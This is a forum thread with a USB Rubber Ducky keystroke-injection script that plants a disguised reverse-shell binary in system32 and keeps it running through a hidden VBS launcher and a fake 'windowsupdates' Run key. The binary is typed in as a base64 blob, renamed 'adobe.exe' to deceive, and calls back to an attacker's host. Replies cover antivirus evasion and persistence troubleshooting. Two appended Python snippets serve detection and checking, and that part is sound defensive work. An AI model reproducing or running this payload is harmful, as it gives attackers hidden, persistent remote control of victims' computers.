russianmonk Posted October 18, 2011 (edited)

Well, I wanted to make the original Reverse Shell script a little more useful for "remote administration". I wrote a batch file version of this a while ago, so I figured I would use it on the Ducky... worked perfectly. Basically it puts the file in \windows\system32 and makes it run at startup. It first creates runwinupdate.vbs (this allows the command to start the remote program at boot in a hidden cmd window). Next it creates a reg key that runs the vbs script on boot. Then it deletes the reg file after adding it to the registry. Next it creates winwupdate.bat, which has the command to run the remote program at start. (I also renamed remote.exe to adobe.exe... a little more sneaky.) At the bottom of the code I put a little "cleanup" bat file. Makes it easier if you are testing it instead of having to delete everything one by one. Any questions or suggestions, let me know!

***If this description doesn't make sense, sorry... I'm tired***

REM Open an elevated cmd: Start menu, type cmd, context menu, "Run as administrator", answer the UAC prompt
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
REM Launcher that starts the bat at logon without a visible window (window style 0)
REM Full path used here so it does not depend on the working directory wscript gets at logon
STRING copy con c:\windows\system32\runwinupdate.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "c:\windows\system32\winupdate.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
REM Run-key persistence: HKLM\...\Run starts the vbs for every user at logon
STRING copy con c:\windows\system32\dirty.reg
ENTER
STRING REGEDIT4
ENTER
STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ENTER
STRING "windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs"
ENTER
CTRL z
ENTER
REM /s imports silently; absolute paths so this works whatever directory the cmd window opened in
STRING REGEDIT /s c:\windows\system32\dirty.reg
ENTER
STRING del c:\windows\system32\dirty.reg
ENTER
STRING copy con c:\windows\system32\winupdate.bat
ENTER
STRING @echo off
ENTER
STRING cd /D c:\windows\system32
ENTER
STRING adobe.exe "INSERT YOUR INFO HERE" 8080
ENTER
CTRL z
ENTER
REM decoder.vbs: base64 text -> binary via MSXML bin.base64 and ADODB.Stream
REM Consecutive STRING lines are typed onto one line; each chunk ends at a colon so no trailing spaces are needed
STRING copy con c:\windows\system32\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):
STRING outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:
STRING set objFS = CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:
STRING base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:
STRING private function decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:
STRING private Sub writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
REM The reverse shell binary, base64 encoded (becomes adobe.exe)
STRING copy con c:\windows\system32\adobeupdate.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
REM Decode to adobe.exe, remove the decoder and the text blob, then start the shell once now
STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe
ENTER
STRING del c:\windows\system32\decoder.vbs
ENTER
STRING del c:\windows\system32\adobeupdate.txt
ENTER
STRING c:\windows\system32\adobe.exe "INSERT YOUR INFO HERE" 8080
ENTER
STRING exit
ENTER

Cleanup (run this in a bat file if you want to clean up the files):

@echo off
del c:\windows\system32\adobe.exe
del c:\windows\system32\winupdate.bat
REM the Ducky script above never creates runwinupdate.bat, so this line is a harmless no-op
del c:\windows\system32\runwinupdate.bat
del c:\windows\system32\runwinupdate.vbs
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsupdates
pause

Edited February 6, 2013 by midnitesnake (correct formatting)
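Added example, not code from russianmonk's post: a Python stand-in for the decoder.vbs step (base64 text file to binary) plus a sanity check on what it produces. When the cscript step leaves no adobe.exe behind, or leaves one that will not run, the first thing to verify is that the typed-in blob still decodes to something that starts like a Win32 PE. The sample below is only the first two base64 lines of the post's payload (enough for the DOS and PE headers, not a runnable executable); the function names are this example's own.

```python
"""Python equivalent of 'cscript decoder.vbs <in> <out>' with a PE header check."""
import base64
import struct

# First two base64 lines of the payload from the post. Only a fragment: the
# DOS and PE headers (108 bytes), not the whole executable.
PAYLOAD_HEAD = (
    "TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA\n"
    "AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA\n"
)


def decode_base64_text(text: str) -> bytes:
    """Same effect as MSXML's bin.base64 DataType: line breaks and spaces are ignored.

    validate=True makes a character corrupted while typing the blob fail loudly
    instead of silently decoding to garbage.
    """
    cleaned = "".join(text.split())
    return base64.b64decode(cleaned, validate=True)


def parse_pe_header(blob: bytes) -> dict:
    """Read the fields worth checking before trusting a dropped binary.

    Raises ValueError when the bytes do not carry an MZ/PE header.
    """
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    opt = e_lfanew + 0x18  # optional header follows the 24-byte file header
    if opt + 0x20 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=0x%x" % e_lfanew)
    machine, sections = struct.unpack_from("<HH", blob, e_lfanew + 4)
    (magic,) = struct.unpack_from("<H", blob, opt)
    (entry_point,) = struct.unpack_from("<I", blob, opt + 0x10)
    (image_base,) = struct.unpack_from("<I", blob, opt + 0x1C)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,          # 0x014C = i386
        "sections": sections,
        "magic": magic,              # 0x010B = PE32
        "entry_point": entry_point,  # RVA
        "image_base": image_base,
        # e_lfanew inside the 0x40-byte DOS header means the PE header
        # overlaps it, a space-saving trick of packers; linker-built
        # binaries normally put it at 0x80 or later.
        "overlapping_headers": e_lfanew < 0x40,
    }


def decode_file(in_path: str, out_path: str) -> dict:
    """The 'cscript decoder.vbs <in> <out>' call, done in Python.

    Unlike the VBS, this refuses to write anything that does not parse as a PE.
    """
    with open(in_path, "r", encoding="ascii") as fh:
        blob = decode_base64_text(fh.read())
    info = parse_pe_header(blob)
    with open(out_path, "wb") as fh:
        fh.write(blob)
    return info


if __name__ == "__main__":
    for key, value in parse_pe_header(decode_base64_text(PAYLOAD_HEAD)).items():
        print(f"{key:20} {value if isinstance(value, bool) else hex(value)}")
```

On the post's payload this reports e_lfanew 0x10, machine 0x14c, two sections, PE32 magic and an image base of 0x400000: the PE header sits inside the DOS header, which is what a packed binary looks like and is also why a plain "MZ at offset 0" check is not enough on its own.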
bobbyb1980 Posted October 18, 2011

Sounds like a USB version of persistence, but what about anti-virus?

russianmonk Posted October 18, 2011 (Author)

Malwarebytes and MS Security Essentials couldn't find anything on my computer.

telot Posted February 26, 2012

The script's goal is quite admirable and awesome, and I'm very interested in getting it to work. Unfortunately I'm having trouble getting persistence out of this script. It works great during the session after I plug in the Ducky (I get the reverse shell onto my evil server), but after reboot it never comes back up (yes, I'm killing netcat and bringing it back up between reboots). I check HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run on my target machine and there's no entry for winupdate.bat. Instead there's just an entry for Microsoft Security Essentials and the obligatory Default. Any thoughts on why this would be? My only experience doing registry hacks was back in Win98 making the Start button say "FU" instead of Start lol... Any help would be greatly appreciated as always.

telot
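A way to do the check telot describes from a text export instead of by eye, as an added example that is not part of the thread: `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` writes the same REGEDIT-style text that dirty.reg in the first post uses, so one small parser covers both what the Ducky writes and what is actually on the box afterwards. The flagging rule judges the command rather than the value name (an attacker picks the name): any Run or RunOnce entry that launches a script file or a script host gets listed. The Security Essentials value and the per-user "updater" entry in the sample export are constructed for the example; the function names are this example's own.

```python
"""Parse a .reg export and flag Run-key entries that launch scripts or script hosts."""
import re

SCRIPT_HOST_RE = re.compile(
    r"\b(wscript|cscript|mshta|powershell|cmd|rundll32|regsvr32)(\.exe)?\b", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|hta|ps1)\b", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
VALUE_RE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')

# dirty.reg exactly as the original post writes it.
DIRTY_REG = r"""REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs"
"""

# Constructed sample of a `reg export` of both Run keys on a test box: the
# post's entry, an assumed Security Essentials entry (name and path made up
# for the example) and an assumed per-user entry.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="\"C:\\Program Files\\Microsoft Security Client\\msseces.exe\" -hide -runkey"
"windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"updater"="wscript.exe //B \"C:\\Users\\test\\AppData\\Roaming\\u.js\""
"""


def unescape(s: str) -> str:
    """.reg files escape backslash and double quote with a backslash."""
    return re.sub(r'\\([\\"])', r"\1", s)


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: data}} for the string values in .reg text.

    Accepts the REGEDIT4 header (what the post writes) and the
    'Windows Registry Editor Version 5.00' header (what reg export writes).
    Quoted string values are unescaped; hex:/dword: data is kept raw.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "REGEDIT", "Windows Registry Editor")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lstrip("-")  # "[-key]" is a delete marker
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = "(Default)" if m.group(1) == "@" else unescape(m.group(2))
        data = m.group(3).strip()
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = unescape(data[1:-1])
        keys[current][name] = data
    return keys


def suspicious_run_entries(keys: dict) -> list:
    """Flag Run/RunOnce values whose command is a script file or a script host."""
    hits = []
    for path, values in keys.items():
        if not RUN_KEY_RE.search(path):
            continue
        for name, command in values.items():
            reasons = []
            if SCRIPT_HOST_RE.search(command):
                reasons.append("script host")
            if SCRIPT_EXT_RE.search(command):
                reasons.append("script file")
            if reasons:
                hits.append({"key": path, "name": name, "command": command, "reasons": reasons})
    return hits


def load_reg_file(path: str) -> dict:
    """reg export writes UTF-16 with a BOM; a hand-typed REGEDIT4 file is ANSI."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return parse_reg_export(raw.decode("utf-16"))
    return parse_reg_export(raw.decode("cp1252", "replace"))


if __name__ == "__main__":
    for hit in suspicious_run_entries(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{hit['key']}\\{hit['name']}: {hit['command']}  [{', '.join(hit['reasons'])}]")
```

On the sample export the Security Essentials entry passes and the two script launchers are listed; feeding it the post's dirty.reg shows the one entry the Ducky is supposed to leave behind, which is a quick way to confirm what to look for before blaming the import step.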
TeCHemically Posted July 27, 2012

All of these reverse shell scripts I try fail to create the "reverse.exe" file from the txt file via the cscript command. These are Win7 test machines. Any thoughts as to why?

russianmonk Posted August 15, 2012 (Author)

Hey guys, sorry for the slooooowwwww reply. I'll take a look at this soon and do some more testing. Been pretty busy lately. It's such a fun script though :)

ms24 Posted September 13, 2012

Sorry for the stupid and maybe off-topic question, but is it possible with that reverse shell to send/receive files to/from a Windows PC?

Mr-Protocol Posted September 13, 2012

Just FYI, the Social Engineering Toolkit has payloads for Teensy/Ducky in a menu-driven interface.

Batman Posted September 14, 2012

> Just FYI, the Social Engineering Toolkit has payloads for Teensy/Ducky in a menu-driven interface.

Do you know if these payloads are kept up to date? Thanks.

Mr-Protocol Posted September 14, 2012

> Do you know if these payloads are kept up to date? Thanks.

Not sure. I would think they would be kept updated with the SET toolkit defaults.